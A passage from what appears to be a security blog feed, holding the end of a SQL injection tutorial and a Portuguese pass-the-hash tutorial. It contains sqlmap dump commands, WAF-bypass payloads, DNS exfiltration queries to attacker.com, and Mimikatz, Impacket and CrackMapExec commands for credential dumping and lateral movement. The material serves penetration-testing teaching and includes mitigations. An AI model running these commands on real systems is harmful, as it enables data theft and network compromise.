style="color:#56B6C2">=</span><span style="color:#D19A66"> 126</span><span style="color:#C678DD"> else</span><span style="color:#56B6C2"> &#x26;</span><span style="color:#7F848E;font-style:italic">#x27;&#x26;#x27;</span></span></code></pre> <hr> <h2 id="using-sqlmap">Using sqlmap</h2> <p>For professional automation, <strong>sqlmap</strong> is the standard tool.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Basic detection</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://target.com/user?id</span><span style="color:#98C379">=1</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#61AFEF">--batch</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Force specific techniques</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://target.com/user?id</span><span style="color:#98C379">=1</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#E06C75"> --technique</span><span style="color:#56B6C2">=</span><span style="color:#98C379">BT</span><span style="color:#61AFEF"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --level=3</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --risk=2</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Extract database, tables, and dump</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://target.com/user?id</span><span style="color:#98C379">=1</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> --dbs</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://target.com/user?id</span><span style="color:#98C379">=1</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> -D</span><span style="color:#98C379"> target_db</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --tables</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://target.com/user?id</span><span style="color:#98C379">=1</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> -D</span><span style="color:#98C379"> target_db</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -T</span><span style="color:#98C379"> users</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --dump</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Via POST request</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://target.com/login</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#E06C75"> --data</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">username</span><span style="color:#56B6C2">=</span><span style="color:#98C379">admin</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">amp</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">password</span><span style="color:#ABB2BF">;</span><span style="color:#98C379">=</span><span style="color:#56B6C2">test</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> -p</span><span style="color:#98C379"> username</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --batch</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Via Burp intercepted request</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -r</span><span style="color:#98C379"> request.txt</span><span style="color:#D19A66"> --batch</span><span style="color:#D19A66"> --level=5</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># With authenticated session cookie</span></span> <span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://target.com/profile?id</span><span style="color:#98C379">=1</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#E06C75"> --cookie</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#E06C75">session</span><span style="color:#56B6C2">=</span><span style="color:#98C379">abc123</span><span style="color:#ABB2BF">; </span><span style="color:#E06C75">csrftoken</span><span style="color:#56B6C2">=</span><span style="color:#98C379">xyz</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> --batch</span></span></code></pre> <h3 id="sqlmap-with-proxy-burp-suite">sqlmap with proxy (Burp Suite)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">sqlmap</span><span style="color:#D19A66"> -u</span><span style="color:#ABB2BF"> &#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://target.com/user?id</span><span style="color:#98C379">=1</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#E06C75"> --proxy</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">;</span><span style="color:#61AFEF">http://127.0.0.1:8080</span><span style="color:#ABB2BF">&#x26;</span><span style="color:#61AFEF">quot</span><span style="color:#ABB2BF">; </span><span style="color:#56B6C2">\</span></span> <span class="line"><span style="color:#61AFEF"> --batch</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> --tamper=space2comment,randomcase</span></span></code></pre> <hr> <h2 id="waf-bypass">WAF bypass</h2> <h3 id="useful-sqlmap-tamper-scripts">Useful sqlmap tamper scripts</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Space → SQL comment</span></span> <span class="line"><span style="color:#E06C75">--tamper</span><span style="color:#56B6C2">=</span><span style="color:#98C379">space2comment</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Random case: SELECT → SeLeCt</span></span> <span class="line"><span style="color:#E06C75">--tamper</span><span style="color:#56B6C2">=</span><span style="color:#98C379">randomcase</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Encode URL payloads</span></span> <span class="line"><span style="color:#E06C75">--tamper</span><span style="color:#56B6C2">=</span><span style="color:#98C379">percentage</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Combine multiple tampers</span></span> <span class="line"><span style="color:#E06C75">--tamper</span><span style="color:#56B6C2">=</span><span style="color:#98C379">space2comment,randomcase,between</span></span></code></pre> <h3 id="manually-obfuscated-payloads">Manually obfuscated payloads</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- Spaces replaced with comments</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#7F848E;font-style:italic">/**/</span><span style="color:#C678DD">AND</span><span style="color:#7F848E;font-style:italic">/**/</span><span style="color:#D19A66">1</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">1</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Inline comments to separate keywords</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#7F848E;font-style:italic"> /*!AND*/</span><span style="color:#D19A66"> 1</span><span style="color:#56B6C2">=</span><span style="color:#D19A66">1</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Hex encoding of strings</span></span> <span class="line"><span style="color:#D19A66">1</span><span style="color:#C678DD"> AND</span><span style="color:#56B6C2"> SUBSTRING</span><span style="color:#ABB2BF">(</span><span style="color:#C678DD">database</span><span style="color:#ABB2BF">(),</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">,</span><span style="color:#D19A66">1</span><span style="color:#ABB2BF">)</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">0x64</span><span style="color:#7F848E;font-style:italic">--</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic">-- Double URL encoding (for WAFs that decode once)</span></span> <span class="line"><span style="color:#ABB2BF">%</span><span style="color:#D19A66">2527</span><span style="color:#ABB2BF"> → %</span><span style="color:#D19A66">27</span><span style="color:#ABB2BF"> → &#x26;#x27;</span></span></code></pre> <hr> <h2 id="out-of-band-oob-exfiltration">Out-of-Band (OOB) Exfiltration</h2> <p>When both boolean and time-based are blocked, exfiltrate via DNS or HTTP.</p> <h3 id="mysql--dns-exfiltration">MySQL — DNS Exfiltration</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- Requires FILE privilege and external DNS resolution</span></span> <span class="line"><span style="color:#C678DD">SELECT</span><span style="color:#ABB2BF"> LOAD_FILE(</span><span style="color:#56B6C2">CONCAT</span><span style="color:#ABB2BF">(&#x26;#x27;\\\\&#x26;#x27;,</span></span> <span class="line"><span style="color:#ABB2BF"> (</span><span style="color:#C678DD">SELECT</span><span style="color:#C678DD"> database</span><span style="color:#ABB2BF">()),</span></span> <span class="line"><span style="color:#ABB2BF"> &#x26;#x27;.</span><span style="color:#D19A66">attacker</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">com</span><span style="color:#ABB2BF">\\share&#x26;#x27;))</span><span style="color:#7F848E;font-style:italic">--</span></span></code></pre> <h3 id="mssql--xp_dirtree-dns">MSSQL — xp_dirtree DNS</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="sql"><code><span class="line"><span style="color:#7F848E;font-style:italic">-- Via xp_dirtree (no need for xp_cmdshell)</span></span> <span class="line"><span style="color:#C678DD">EXEC</span><span style="color:#D19A66"> master</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">dbo</span><span style="color:#ABB2BF">.xp_dirtree</span></span> <span class="line"><span style="color:#ABB2BF"> &#x26;#x27;\\&#x26;#x27; + (</span><span style="color:#C678DD">SELECT</span><span style="color:#C678DD"> TOP</span><span style="color:#D19A66"> 1</span><span style="color:#ABB2BF"> table_name </span><span style="color:#C678DD">FROM</span><span style="color:#D19A66"> information_schema</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">tables</span><span style="color:#ABB2BF">) + &#x26;#x27;.</span><span style="color:#D19A66">attacker</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">com</span><span style="color:#ABB2BF">\x&#x26;#x27;</span><span style="color:#7F848E;font-style:italic">--</span></span></code></pre> <h3 id="capturing-with-interactsh-or-burp-collaborator">Capturing with interactsh or Burp Collaborator</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Start listener with interactsh-client</span></span> <span class="line"><span style="color:#61AFEF">interactsh-client</span><span style="color:#D19A66"> -v</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Your callback URL is: xxxx.interactsh.com</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Use in payload:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># &#x26;#x27; AND LOAD_FILE(CONCAT(&#x26;#x27;\\\\&#x26;#x27;, database(), &#x26;#x27;.xxxx.interactsh.com\\x&#x26;#x27;))--</span></span></code></pre> <hr> <h2 id="mitigation">Mitigation</h2> <table><thead><tr><th>Vector</th><th>Recommended Control</th></tr></thead><tbody><tr><td>Dynamic query</td><td>Use <strong>Prepared Statements</strong> / Parameterized Queries</td></tr><tr><td>Insecure ORM</td><td>Avoid raw queries; use ORMs with bind parameters</td></tr><tr><td>Verbose errors</td><td>Disable stack traces in production</td></tr><tr><td>Lack of WAF</td><td>Implement WAF with OWASP CRS rules</td></tr><tr><td>Excessive permissions</td><td>DB user should only have SELECT on necessary tables</td></tr><tr><td>OOB via DNS</td><td>Block outgoing DNS resolution on the DB server</td></tr></tbody></table> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="python"><code><span class="line"><span style="color:#7F848E;font-style:italic"># SECURE: Parameterized query in Python (psycopg2)</span></span> <span class="line"><span style="color:#C678DD">import</span><span style="color:#ABB2BF"> psycopg2</span></span> <span class="line"></span> <span class="line"><span style="color:#ABB2BF">conn </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> psycopg2.</span><span style="color:#61AFEF">connect</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#E06C75;font-style:italic">dbname</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">app </span><span style="color:#E06C75;font-style:italic">user</span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF">readonly</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"><span style="color:#ABB2BF">cur </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> conn.</span><span style="color:#61AFEF">cursor</span><span style="color:#ABB2BF">()</span></span> <span class="line"></span> <span class="line"><span style="color:#ABB2BF">user_id </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> request.args.</span><span style="color:#61AFEF">get</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#56B6C2">id&#x26;</span><span style="color:#ABB2BF">quot;)</span></span> <span class="line"><span style="color:#ABB2BF">cur.</span><span style="color:#61AFEF">execute</span><span style="color:#ABB2BF">(</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;</span><span style="color:#D19A66">SELECT</span><span style="color:#ABB2BF"> username </span><span style="color:#D19A66">FROM</span><span style="color:#ABB2BF"> users </span><span style="color:#D19A66">WHERE</span><span style="color:#E06C75;font-style:italic"> id</span><span style="color:#56B6C2"> =</span><span style="color:#56B6C2"> %</span><span style="color:#ABB2BF">s</span><span style="color:#56B6C2">&#x26;</span><span style="color:#ABB2BF">quot;, (user_id,))</span></span> <span class="line"><span style="color:#ABB2BF">row </span><span style="color:#56B6C2">=</span><span style="color:#ABB2BF"> cur.</span><span style="color:#61AFEF">fetchone</span><span style="color:#ABB2BF">()</span></span></code></pre> <hr> <h2 id="references">References</h2> <ul> <li><a href="https://owasp.org/www-community/attacks/SQL_Injection">OWASP SQL Injection</a></li> <li><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection">PayloadsAllTheThings — SQLi</a></li> <li><a href="https://sqlmap.org/">sqlmap documentation</a></li> <li><a href="https://portswigger.net/web-security/sql-injection/blind">PortSwigger Web Security Academy</a></li> </ul> <p>> <strong>DISCLAIMER:</strong> This content is intended exclusively for authorized security professionals. The use of these techniques on systems without explicit authorization is illegal. KBM Security is not responsible for misuse.</p>redteam@kbmsecurity.com.brwebsqliblindwebdatabaseboolean-basedtime-basedsqlmaphardPass-the-Hash — Lateral Movement sem senha em texto clarohttps://www.kbmsecurity.com.br/blog/post/pass-the-hash/https://www.kbmsecurity.com.br/blog/post/pass-the-hash/Como capturar hashes NTLM e usá-los diretamente para autenticação lateral em redes Windows sem necessidade de crackear a senha.Mon, 03 Feb 2025 00:00:00 GMT<h2 id="o-que-é-pass-the-hash">O que é Pass-the-Hash?</h2> <p><strong>Pass-the-Hash (PtH)</strong> é uma técnica de ataque que permite autenticação em serviços Windows utilizando o <strong>hash NTLM</strong> da senha de um usuário — sem nunca precisar da senha em texto claro.</p> <p>O protocolo de autenticação NTLM do Windows não valida se o cliente conhece a senha original; ele valida se o cliente possui o hash correto. Isso torna hashes NTLM funcionalmente equivalentes a senhas.</p> <h2 id="por-que-isso-funciona">Por que isso funciona?</h2> <p>O fluxo de autenticação NTLM funciona assim:</p> <ol> <li>Cliente solicita acesso ao servidor</li> <li>Servidor envia um <strong>challenge</strong> (nonce aleatório)</li> <li>Cliente responde com <code>HMAC-MD5(NT_hash, challenge)</code></li> <li>Servidor verifica a resposta</li> </ol> <p>Em nenhum momento a senha em texto claro é transmitida ou verificada. O hash <strong>é</strong> a credencial.</p> <h2 id="pré-requisitos">Pré-requisitos</h2> <table><thead><tr><th>Requisito</th><th>Detalhe</th></tr></thead><tbody><tr><td>Hash NTLM do alvo</td><td>Obtido via Mimikatz, secretsdump, etc.</td></tr><tr><td>Serviço acessível</td><td>SMB (445), WMI (135), RDP com NLA desabilitado</td></tr><tr><td>Conta válida</td><td>Local admin ou domain admin no destino</td></tr><tr><td>Protocolo NTLMv1/v2</td><td>NTLM deve estar habilitado no alvo</td></tr></tbody></table> <blockquote> <p><strong>Nota:</strong> Pass-the-Hash <strong>não funciona</strong> contra serviços que exigem Kerberos exclusivamente (e.g. ambientes com “Restrict NTLM” configurado via GPO).</p> </blockquote> <h2 id="etapa-1--capturando-hashes-ntlm">Etapa 1 — Capturando hashes NTLM</h2> <h3 id="via-mimikatz-acesso-local-com-system">Via Mimikatz (acesso local com SYSTEM)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Dump de credenciais em memória</span></span> <span class="line"><span style="color:#56B6C2">mimikatz.exe</span><span style="color:#98C379"> "privilege::debug"</span><span style="color:#98C379"> "sekurlsa::logonpasswords"</span><span style="color:#C678DD"> exit</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Output relevante:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Username : Administrator</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># NTLM : aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span></span></code></pre> <h3 id="via-impacket-secretsdump-remoto-com-credenciais-admin">Via Impacket secretsdump (remoto, com credenciais admin)</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Dump remoto via SMB + DCE/RPC</span></span> <span class="line"><span style="color:#61AFEF">secretsdump.py</span><span style="color:#98C379"> DOMAIN/Administrator:'P@ssw0rd'@192.168.1.10</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Dump usando hash (já fazendo PtH para capturar mais hashes)</span></span> <span class="line"><span style="color:#61AFEF">secretsdump.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/Administrator@192.168.1.10</span></span></code></pre> <h3 id="via-crackmapexec">Via CrackMapExec</h3> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Dump de SAM database</span></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> 192.168.1.0/24</span><span style="color:#D19A66"> -u</span><span style="color:#98C379"> Administrator</span><span style="color:#D19A66"> -H</span><span style="color:#98C379"> 8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#D19A66"> --sam</span></span></code></pre> <p>O formato do hash é sempre <code>LM:NT</code>. O LM geralmente é <code>aad3b435b51404eeaad3b435b51404ee</code> (hash vazio) em sistemas modernos. O que importa é a parte <strong>NT</strong>.</p> <h2 id="etapa-2--executando-o-pth">Etapa 2 — Executando o PtH</h2> <h3 id="impacket--psexecpy">Impacket — psexec.py</h3> <p>Abre um shell interativo no host remoto via SMB:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">psexec.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/Administrator@192.168.1.20</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Resultado:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># [*] Requesting shares on 192.168.1.20.....</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># [*] Found writable share ADMIN$</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># [*] Uploading file XKjQrPwN.exe</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Microsoft Windows [Version 10.0.19044.2251]</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># C:\Windows\system32></span></span></code></pre> <h3 id="impacket--wmiexecpy">Impacket — wmiexec.py</h3> <p>Execução via WMI (mais silencioso que psexec, sem arquivo em disco):</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">wmiexec.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/Administrator@192.168.1.20</span><span style="color:#98C379"> "whoami"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Resultado: domain\administrator</span></span></code></pre> <h3 id="impacket--smbclientpy">Impacket — smbclient.py</h3> <p>Acesso ao filesystem via SMB:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#61AFEF">smbclient.py</span><span style="color:#D19A66"> -hashes</span><span style="color:#98C379"> aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#98C379"> DOMAIN/Administrator@192.168.1.20</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Navegar nos shares:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># # use C$</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># # ls</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># # get Users\Administrator\Desktop\flag.txt</span></span></code></pre> <h3 id="crackmapexec--spray-na-rede">CrackMapExec — Spray na rede</h3> <p>Testar o hash contra múltiplos hosts de uma vez:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Verificar quais hosts aceitam o hash</span></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> 192.168.1.0/24</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -u</span><span style="color:#98C379"> Administrator</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -H</span><span style="color:#98C379"> 8846f7eaee8fb117ad06bdd830b7586c</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Executar comando em todos que aceitaram</span></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> 192.168.1.0/24</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -u</span><span style="color:#98C379"> Administrator</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -H</span><span style="color:#98C379"> 8846f7eaee8fb117ad06bdd830b7586c</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -x</span><span style="color:#98C379"> "net user /domain"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Output com (Pwn3d!) indica sucesso como admin local:</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># SMB 192.168.1.20 445 WIN10-DEV [+] DOMAIN\Administrator (Pwn3d!)</span></span> <span class="line"><span style="color:#7F848E;font-style:italic"># SMB 192.168.1.25 445 WIN-SRV01 [+] DOMAIN\Administrator (Pwn3d!)</span></span></code></pre> <h3 id="mimikatz--sekurlsapth">Mimikatz — sekurlsa::pth</h3> <p>Injeta o hash no processo atual para autenticação transparente:</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="powershell"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Abre um cmd.exe autenticado com o hash</span></span> <span class="line"><span style="color:#56B6C2">mimikatz.exe</span><span style="color:#98C379"> "sekurlsa::pth /user:Administrator /domain:CORP /ntlm:8846f7eaee8fb117ad06bdd830b7586c /run:cmd.exe"</span></span> <span class="line"></span> <span class="line"><span style="color:#7F848E;font-style:italic"># Na janela resultante:</span></span> <span class="line"><span style="color:#ABB2BF">dir \\</span><span style="color:#D19A66">192.168</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">1.20</span><span style="color:#ABB2BF">\C$ </span><span style="color:#7F848E;font-style:italic"># acesso direto sem prompt de senha</span></span> <span class="line"><span style="color:#ABB2BF">net use \\</span><span style="color:#D19A66">192.168</span><span style="color:#ABB2BF">.</span><span style="color:#D19A66">1.20</span><span style="color:#ABB2BF">\C$ </span><span style="color:#7F848E;font-style:italic"># mapeia o share</span></span></code></pre> <h2 id="movimento-em-ambientes-de-domínio">Movimento em ambientes de domínio</h2> <h3 id="identificando-hosts-com-o-mesmo-hash-local">Identificando hosts com o mesmo hash local</h3> <p>Ambientes Windows legados frequentemente têm a conta <code>.\Administrator</code> local com a <strong>mesma senha</strong> em todos os workstations (imagem de SO idêntica). Um único hash compromete toda a subnet.</p> <pre class="astro-code one-dark-pro" style="background-color:#282c34;color:#abb2bf; overflow-x: auto; white-space: pre-wrap; word-wrap: break-word;" tabindex="0" data-language="bash"><code><span class="line"><span style="color:#7F848E;font-style:italic"># Mapeamento rápido de ativos com o mesmo hash</span></span> <span class="line"><span style="color:#61AFEF">crackmapexec</span><span style="color:#98C379"> smb</span><span style="color:#98C379"> 10.10.10.0/24</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> -u</span><span style="color:#98C379"> Administrator</span><span style="color:#56B6C2"> \</span></span> <span class="line"><span style="color:#D19A66"> 